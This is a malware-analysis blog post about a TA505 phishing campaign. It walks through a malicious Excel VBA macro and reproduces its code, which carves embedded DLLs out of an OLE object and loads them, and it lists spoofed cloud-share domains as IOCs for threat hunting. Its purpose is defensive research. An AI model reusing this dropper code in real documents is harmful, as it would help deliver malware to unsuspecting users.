Starting September we have seen a rise in campaigns from TA505 threat actor. They send emails in bulk with spoofed messages regarding hosted files on (spoofed) cloud share services. The sites look very similar to the real deal and allow download of MS Excel files and, in some cases, Word Docs, which contain VBA macros that drop and execute malicious DLLs. These campaigns are dropping RATs and downloaders. More IOCs will be provided at the end of the blog but only one example is covered in this blogpost. After all we have to do some ‘evil code analysis.’
This particular sample ‘N98300_10.21.19.xls’ (6e31b0051adf99888d50d8679c329ffb9b41991e04d8b639cc01f13e5f46656f) was downloaded from hxxps://dl2.dropbox-er[.]com/?BSoFW, which spoofed a dropbox file download page.
As soon as the file is downloaded and opened the below event should have triggered; however, due to a compilation error it stops.
Since PtrSafe is being used in both the #if and #else directives statement blocks it will fail to compile if run with VBA 6 or earlier. This macro is not backward compatible, probably a mistake from the malware author.
If we take a look at the directives the only difference is PtrSafe keywords in Win64 case and the dll file names, libDxdiag2.dll vs libDxdiag1.dll.
The function below in Module1 initializes some variables.
Public Sub AppStart() Dim PointerNull As Object Dim SpecialPath As String Set PointerNull = CreateObject("WScri" + "pt.Shell") '<--WScript.Shell object UserForm6.TextBox1.Tag = PointerNull.ExpandEnvironmentStrings("%" + UserForm6.TextBox1.Tag + "%") '^ contains %Temp% UserForm6.TextBox2.Tag = PointerNull.SpecialFolders(UserForm6.TextBox2.Tag) '^ contains %AppData%\Roaming\Microsoft\Windows\Templates ChDir (UserForm6.TextBox1.Tag) UserForm1.show End Sub
The function ReplaceCurrentModule() in Module5 holds most of the meat of this malicious macro.
It concatenates some variables and strings to store filenames:
TextBox1Tag = %Temp%\libProject.xlsx ZipName = %Temp%\libProject.xlsx.zip ZipFolder = %Temp% nm = %AppData%\Roaming\Microsoft\Windows\Templates\libDxdiag1 CNPK = 278528 FilePosition = 1
Now the below directives may change some of the above values based on the platform:
#If Win64 Then nm = UserForm6.TextBox2.Tag + "\libDxdiag2" CNPK = 252928 FilePosition = 2
And after the end of the directives .dll is appended to the nm variable.
The function KillArray in Module6 cleans all the files just in case they are already present in the above temporary locations.
'KillArray ZipFolder & "\ole" + "Obj" + "ect*.bin", ZipName, nm Public Sub KillArray(ParamArray PathList() As Variant) On Error Resume Next For Each Key In PathList Kill Key Next Key On Error GoTo 0 End Sub
Then function ReplaceFile saves this workbook as %Temp%\libProject.xslx with file format 51 (xlOpenXMLWorkbook). More on excel file format enumeration here.
After that the same file is copied to the same folder with zip extension.
FileCopy TextBox1Tag, ZipName
In the next part of this function the ole object is copied out of the zip file location xl\embeddings\oleObject1.bin to the ZipFolder(%Temp%), as this contains the dll files.
Next the below function call from Module1 is executed:
NewValuje ZipFolder + "\oleObject" + "1" + ".b" + "in", nm, CNPK, FilePosition
This function is where it copies the embedded dll data out to the dll file. All it does is check for the MZ header and then start copying.
The function params are:
s = C:\Users\REM\AppData\Local\Temp\oleObject1.bin (source to copy from)
nm = C:\Users\REM\AppData\Roaming\Microsoft\Windows\Templates\libDxdiag1.dll (dll to copy to)
fl = 278528 (file length)
Variable_6 = 1 (or 2; file position) there are 2 DLLs embedded in the xls
Public Sub NewValuje(s As String, nm As String, fl As Long, Variable_6 As Integer) Dim Variable_1 As Long, Variable_2 As Byte, Variable_3 As Byte, Variable_4 As Byte Dim Variable_5() As Long ReDim Variable_5(1 To fl) Variable_5(1) = CByte(40 + 37) '<-- decimal 77 = M Variable_5(2) = CByte(40 + 50) '<-- decimal 90 = Z Variable_5(1 + 2) = CByte(40 + 104) '<-- decimal 144 'which means the Variable_5 first 3 bytes are 4d 5a 90 Variable_1 = FreeFile Open s For Binary Access Read As Variable_1 Dim cur As Integer cur = 1 Do While Not EOF(Variable_1) Get Variable_1, , Variable_2 If Variable_2 = Variable_5(1) Then Get Variable_1, , Variable_3 If Variable_3 = Variable_5(2) Then Get Variable_1, , Variable_4 If Variable_4 = Variable_5(3) Then If cur = Variable_6 Then 'if the first file position in case of 32 bit For k = 4 To fl Get Variable_1, , Variable_2 Variable_5(k) = Variable_2 Next k Exit Do Else cur = cur + 1 'if the second file position in case of 64 bit End If End If End If End If Loop Close Variable_1
Then the DLL file is written to the location in nm variable.
At the end ReplaceCurrentModule() loads the DLL using LoadLibraryW
GetName2 (nm) 'Already imported
then calls the dll GetName function, which merely runs DLLEntryPoint.
The x64 version appears to be UPX packed.
Now this macro doesn’t do anything out of the ordinary except the social engineering part where it shows user form image that resembles install of office components as if something had failed.
Out of the most variants I have seen of this macro the above sample is the only one with the compilation error.
I use urlscan.io to hunt for similar URLs, like this query https://urlscan.io/search/#domain%3A%20googledrive-*. One can use similar queries to look for these domains. However, due to possible urlscan.io evasion the TA505 domains redirect to apple.com. But I have found this to be a good indicator that the domain is from the same group.
Below are the other domains that look like cloud storage file download pages:
box-cnd[.]com <– using onehub.com
Other lesser known services like owncloud and sync have also been spoofed.